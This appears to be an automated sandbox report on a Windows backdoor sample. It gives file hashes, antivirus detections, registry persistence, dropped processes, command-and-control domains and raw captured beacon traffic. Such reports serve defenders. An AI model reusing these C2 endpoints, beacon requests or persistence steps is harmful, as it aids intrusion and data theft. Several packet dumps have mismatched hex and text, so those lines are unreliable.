Analysis Date2015-01-16 09:17:39
MD57476c62292ea89f87a84b1f2d4195991
SHA11f91d2ae1831dfee6adaa428b6988ba50069a40a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 286a2307a99f0a535be77de9e9c931d4 sha1: ae5fc62361829b4e2c86a90117fa66d619fc0325 size: 164864
Section.rdata md5: 18aba411bb0d55b257d57b9c44ed15a7 sha1: 23b4874e5b2d2d9e0668a85c9d5ec04089c830c9 size: 2048
Section.data md5: 3531a822ec21f8cab380e7129ccf93cc sha1: 5e1e6db067753a4dd0f92abaa93ea592b7cb9d04 size: 25088
Section.lib md5: 4b92efec599445ba745a1d5144ccc969 sha1: 4a93ab4376603e7d236887db56d0a2a9affef0ef size: 512
Timestamp2005-11-07 01:28:01
VersionPrivateBuild: 1520
PEhash8fb8662981114ed1d67b717c0c72bc1c612bcecc
IMPhasha5333e8c11366f7f953c78610b8ba8af
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Diple.psa
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-207401
AVDr. WebTrojan.Packed.1879
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KPB
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CFW
AVIkarusTrojan-Spy.Win32.Zbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Diple.li
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdifferentdata-one.com
Winsock DNS127.0.0.1
Winsock DNSfreemaildotaccess.com
Winsock DNSremotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSremotesupportsystem.com
Type: A
69.13.210.253
DNSzonetf.com
Type: A
141.8.225.80
DNSfreemaildotaccess.com
Type: A
DNSdifferentdata-one.com
Type: A
HTTP GEThttp://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKydAic6p17YhX0MqV2c%2BNwF1HcwqI8jZlk1MW4E3L3qgD4sDa010iFDG2thsLaVeIpa%2BYoQ89gz3nTKkFCg0by4xVw9pbT4PlBGeR0I%2Fy%2BctrLMX9nGGeAM%2FLstreu01j1f0olTKTaNM5qcjrrOxT1o4Bpa4%2FzxYrLPHGCYjI7va24hP3Xf%2FkcykewqakqYAkO8hSTBT4qogN7DkIyj226TLLIHW2cP03DQI1h1iLtimk9pqHEBf0Z00v5X3cQ%2F%2BM0yFXzcYrOD0jF9pbVhCDA7ozMEE%2BORkKoKgfRe99U1RzcmoturnO3Sv%2FI0EGfrvaoAg1DjYsIfG8IMxlWHV7HfR61RAaK3nj78PDSTydxpclUXKqWdWy3MWMcCBiXbTOpmzuFWT7X6YWFw8k1VwcP%2FFeEvMHPB8C6mVhlUDsD8F5l9O87XshXinY1Asw5Qro3k9C42KY7Wqz7nKawLSoYcEi3dnHdwmonJz5IivpKwOvPX2ldapaaVkiTuHxDJ1pT7%2BvdB8E1z6TqzcGJq7ej1PDQbSY0DiTBjnM983TGF2HTkCl8kOd9kMr3MRk3G0P7q33y5p%2BEPK0STxo%2Fxr%2FvKlDPqL9V6yFJ2zZEiZt35%2BCwnw6Z3arBPgygbKJVHlcxxmZ5eRHosZ
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNw1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 72737375   GET /images/rssu
0x00000010 (00016)   6e695f73 6d616c6c 2e676966 3f74713d   ni_small.gif?tq=
0x00000020 (00032)   67503461 4b796441 69633670 31375968   gP4aKydAic6p17Yh
0x00000030 (00048)   58304d71 56326325 32424e77 46314863   X0MqV2c%2BNwF1Hc
0x00000040 (00064)   77714938 6a5a6c6b 314d5734 45334c33   wqI8jZlk1MW4E3L3
0x00000050 (00080)   71674434 73446130 31306946 44473274   qgD4sDa010iFDG2t
0x00000060 (00096)   68734c61 56654970 61253242 596f5138   hsLaVeIpa%2BYoQ8
0x00000070 (00112)   39677a33 6e544b6b 46436730 62793478   9gz3nTKkFCg0by4x
0x00000080 (00128)   56773970 62543450 6c424765 52304925   Vw9pbT4PlBGeR0I%
0x00000090 (00144)   32467925 32426374 724c4d58 396e4747   2Fy%2BctrLMX9nGG
0x000000a0 (00160)   65414d25 32464c73 74726575 30316a31   eAM%2FLstreu01j1
0x000000b0 (00176)   66306f6c 544b5461 4e4d3571 636a7272   f0olTKTaNM5qcjrr
0x000000c0 (00192)   4f785431 6f344270 61342532 467a7859   OxT1o4Bpa4%2FzxY
0x000000d0 (00208)   724c5048 4743596a 49377661 32346850   rLPHGCYjI7va24hP
0x000000e0 (00224)   33586625 32466b63 796b6577 71616b71   3Xf%2Fkcykewqakq
0x000000f0 (00240)   59416b4f 38685354 42543471 6f674e37   YAkO8hSTBT4qogN7
0x00000100 (00256)   446b4979 6a323236 544c4c49 48573263   DkIyj226TLLIHW2c
0x00000110 (00272)   50303344 51493168 31694c74 696d6b39   P03DQI1h1iLtimk9
0x00000120 (00288)   70714845 4266305a 30307635 58336351   pqHEBf0Z00v5X3cQ
0x00000130 (00304)   25324625 32424d30 7946587a 6359724f   %2F%2BM0yFXzcYrO
0x00000140 (00320)   44306a46 39706256 68434441 376f7a4d   D0jF9pbVhCDA7ozM
0x00000150 (00336)   45452532 424f526b 4b6f4b67 66526539   EE%2BORkKoKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a333420   on: close....34 
0x00000150 (00336)   34353333 34633333 20202077 7149386a   45334c33   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a33 34633333 20202077 7149386a   ...34c33   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6b 4b6f4b67 66526539   ose....kKoKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a33 20202077 7149386a   ose....3   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a6f4b67 66526539   close....oKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
